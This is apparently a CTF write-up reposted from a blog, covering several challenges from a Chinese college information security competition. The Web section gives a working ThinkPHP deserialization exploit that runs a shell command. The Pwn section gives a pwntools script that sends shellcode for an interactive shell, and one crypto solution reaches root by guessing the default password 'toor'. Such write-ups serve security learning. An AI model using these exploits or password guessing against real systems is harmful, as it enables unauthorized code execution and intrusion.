Part of the 15th National College Student Information Security Competition WriteUp

I took 10 exams, all of them were bad questions, and my scores were very low. The CTF ranking is 186, and I thought it was safe to enter the divisional competition. Including theoretical questions, there are more than 1,500 people, and there are more than 200 people in Southeast China. I can't get in, and WriteUp doesn't want to upload it.

Crypto

I’m not a crypto player, but I unexpectedly solved a few of the crypto challenges.

Sign in to the radio station

Follow the hint given by the public account, "Bi Shi has arrived safely". Look up the Chinese code for these characters, then add it digit by digit to the first 28 digits of the key in the code book given in the challenge, taking each sum modulo 10, as follows:

Take the remainders, remove the spaces, and pass the result in the msg parameter: /send?msg=

ISO9798

After connecting with nc, the server gives you a SHA-256 hash and part of the plaintext, and you have to find the first four characters. The following script recovers them.

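from hashlib import sha256
from itertools import product

target = '加密后的'  # placeholder: the SHA-256 hex digest given by the server
suffix = '部分明文'  # placeholder: the known part of the plaintext given by the server
table = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'

# Try every 4-character prefix until the digest matches
for chars in product(table, repeat=4):
    prefix = ''.join(chars)
    if sha256((prefix + suffix).encode()).hexdigest() == target:
        print(prefix)
        break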

After finding the first four characters, submit them. The server then asks for a 128-byte numeric string; enter one, and it returns a 96-byte string. Divide this string into one segment every 32 bits, for three segments in total: rA, rB, and B. Then concatenate rB and rA and send the result. For example, if this 96-length string is 112233, send 2211. After that, the flag appears.

Two-way authentication based on challenge code

After reading the document for a long time, I found that it just asks you to complete the functions of the verification module. I don't know C and can't read it. SSH connection: ssh player@IP -p port; the password is also player. After connecting, I browsed the directories, found root, and found that I could enter it. I had nothing to do and rummaged around, and then I found the flags, as follows:

cd /root/cube-shell/instance/flag_server
cat flag1.txt
cat flag2.txt

Two-way authentication based on challenge code 2

The flag is flag2 from above.

Two-way authentication based on challenge code 3

By the time this challenge came out, the organizers seemed to have discovered that the first two challenges had no permission checks. Permission checks were therefore added to this one, and the flag could not be viewed. I had no ideas here, and privilege escalation failed. While trying to obtain root permissions, I used the su command to switch users and tried many passwords. The default password on my Kali was toor, so I tried it, and I didn't expect it to succeed. Then I just read flag2 directly. This series is very strange. The intended solution is to complete the client's verification module, and several friends also did it the intended way. But this unintended solution is too simple. Several of the challenges have no meaning and are very strange.

Web

Ezpop

Refer to this https://www.freebuf.com/vuls/321546.html

Just change the dir command in the POC script to cat /flag.txt:

<?php
namespace think{
    abstract class Model{
        private $lazySave = false;
        private $data = [];
        private $exists = false;
        protected $table;
        private $withAttr = [];
        protected $json = [];
        protected $jsonAssoc = false;
        function __construct($obj = ''){
            $this->lazySave = True;
            $this->data = ['whoami' => ['cat /flag.txt']];
            $this->exists = True;
            $this->table = $obj;
            $this->withAttr = ['whoami' => ['system']];
            $this->json = ['whoami',['whoami']];
            $this->jsonAssoc = True;
        }
    }
}
namespace think\model{
    use think\Model;
    class Pivot extends Model{
    }
}

namespace{
    echo(base64_encode(serialize(new think\model\Pivot(new think\model\Pivot()))));
}

The output is base64-decoded, then URL-encoded, and the result is passed in the a parameter of a POST request to the index.php/index/test route.

An example diagram is as follows:

Misc

ez_usb

Filter on usb.src=="2.8.1" and export the specified packets as 1.pcapng; filter on usb.src=="2.10.1" and export the specified packets as 2.pcapng.

Then parse 1.pcapng with UsbKeyboardDataHacker.py.

Remove <CAP> from the resulting string, and then remove <DEL> together with the letter c before it, because DEL means delete, so the letter typed just before it is deleted as well. Then convert the remaining string into a rar file with the following script. The rar file I made using a HEX editor could not be opened. I don’t know why.

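import binascii

hex_data = '字符串'  # placeholder: the cleaned hex string
out_path = '输出的rar路径'  # placeholder: path of the rar file to write

# Decode the hex text to raw bytes and write them out as the archive
with open(out_path, 'wb') as out:
    out.write(binascii.unhexlify(hex_data))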

This archive requires a password, and the password is the string obtained by parsing 2.pcapng with UsbKeyboardDataHacker.py.

Enter the password to get the flag
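The manual cleanup step above (drop <CAP>, apply <DEL> as a backspace) can be done in code before the hex conversion. This is an added example, not part of the original write-up; the function names and the sample string are constructed for illustration, and only the <CAP> and <DEL> tokens mentioned above are handled.

```python
import binascii
import re

# A key token such as "<CAP>" or "<DEL>", or any single ordinary character
TOKEN = re.compile(r"<([A-Z]+)>|(.)", re.S)
RAR_MAGIC = b"Rar!\x1a\x07"  # common prefix of the RAR 4.x and 5.x signatures


def apply_keystrokes(stream: str) -> str:
    """Replay the stream: <DEL> erases the previous character, <CAP> is dropped."""
    typed = []
    for m in TOKEN.finditer(stream):
        tag, char = m.group(1), m.group(2)
        if tag == "DEL":
            if typed:  # a <DEL> at the very start has nothing to erase
                typed.pop()
        elif tag == "CAP":
            continue  # hex digits are case-insensitive, so the toggle is irrelevant
        elif tag is not None:
            raise ValueError(f"unhandled key token <{tag}>")
        else:
            typed.append(char)
    return "".join(typed)


def hex_to_rar(stream: str) -> bytes:
    """Return the archive bytes, or raise if the cleaned text is not a RAR file."""
    text = apply_keystrokes(stream)
    if len(text) % 2 or not re.fullmatch(r"[0-9a-fA-F]*", text):
        raise ValueError("cleaned text is not an even-length hex string")
    data = binascii.unhexlify(text)
    if not data.startswith(RAR_MAGIC):
        raise ValueError("decoded bytes do not start with the RAR signature")
    return data


# Constructed sample (not the challenge capture): the signature of a RAR 4.x file
SAMPLE = "5261<CAP>72211a07c<DEL>00"

if __name__ == "__main__":
    print(hex_to_rar(SAMPLE))
```

The length and signature checks fail loudly when a stray character survives the cleanup, instead of writing an archive that will not open.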

Questionnaire

After I filled it out, it could not be submitted because the organizers hadn’t bought a membership, hahaha, I laughed to death. The organizers then seem to have bought one, and the flag is given when the questionnaire is submitted.

Pwn

login-nomal

exp:

from pwn import*
context.log_level = "debug"
io = remote("ip","port")

io.recv()
shellcode = "Rh0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t"
payload = "opt:1\n" + "msg:ro0t1\n"
io.sendline(payload)
payload = "opt:2\n" + "msg:" + shellcode + "\n"
io.sendline(payload)
io.interactive()

Just pay attention to how the shellcode is written.

Reverse

baby_tree

Just open the file as text and take out the values. Just read it the hard way, treating it as Swift. Unfortunately, I didn’t see that one. After talking to friends after the game, I found that there are many ways to write it. Here I only put one written in Python.

res=[88,35,88,225,7,201,57,94,77,56,75,168,72,218,64,91,16,101,32,207,73,
     130,74,128,76,201,16,248,41,205,103,84,91,99,79,202,22,131,63,255,20,16]
key=[ord(c) for c in "345y"]

# Forward transform (for reference): slide a 4-byte window over the data,
# mix each window with the key, and rotate the key left after every step.
def my_encode(data,key):
    b=data
    k=key
    for i in range(len(b)-4+1):
        r0,r1,r2,r3=b[i],b[i+1],b[i+2],b[i+3]
        b[i]=r2^((k[0]+(r0>>4))&0xff)
        b[i+1]=r3^((k[1]+(r1>>2))&0xff)
        b[i+2]=r0^k[2]
        b[i+3]=r1^k[3]
        k[0],k[1],k[2],k[3]=k[1],k[2],k[3],k[0]
    return b==res

# Inverse transform: undo the windows from the last one back to the first.
def my_decode(data,key):
    b=data
    k=key
    # The last window (i=38) used the key rotated left 38 times, i.e. by 2
    k[0], k[1], k[2], k[3] = k[2], k[3], k[0],k[1]
    for i in range(38,-1,-1):
        r1=b[i+3]^k[3]
        r0=b[i+2]^k[2]
        r3=b[i+1]^((k[1]+(r1>>2))&0xff)
        r2=b[i]^((k[0]+(r0>>4))&0xff)
        # Rotate the key right to get the key used by the previous window
        k[1], k[2], k[3], k[0] = k[0], k[1], k[2], k[3]
        b[i], b[i + 1], b[i + 2], b[i + 3] = r0, r1, r2, r3
    print("".join(chr(i) for i in b))

my_decode(res,key)

The flag is: flag{30831242-56db-45b4-96fd-1f47e60da99d}

I did ten of them and solved 50% of them. It’s very annoying that I didn’t make it to the divisional round. The setting of theoretical questions makes people want to drive a dump truck and create a designer!


Origin blog.csdn.net/qq_45619909/article/details/125038773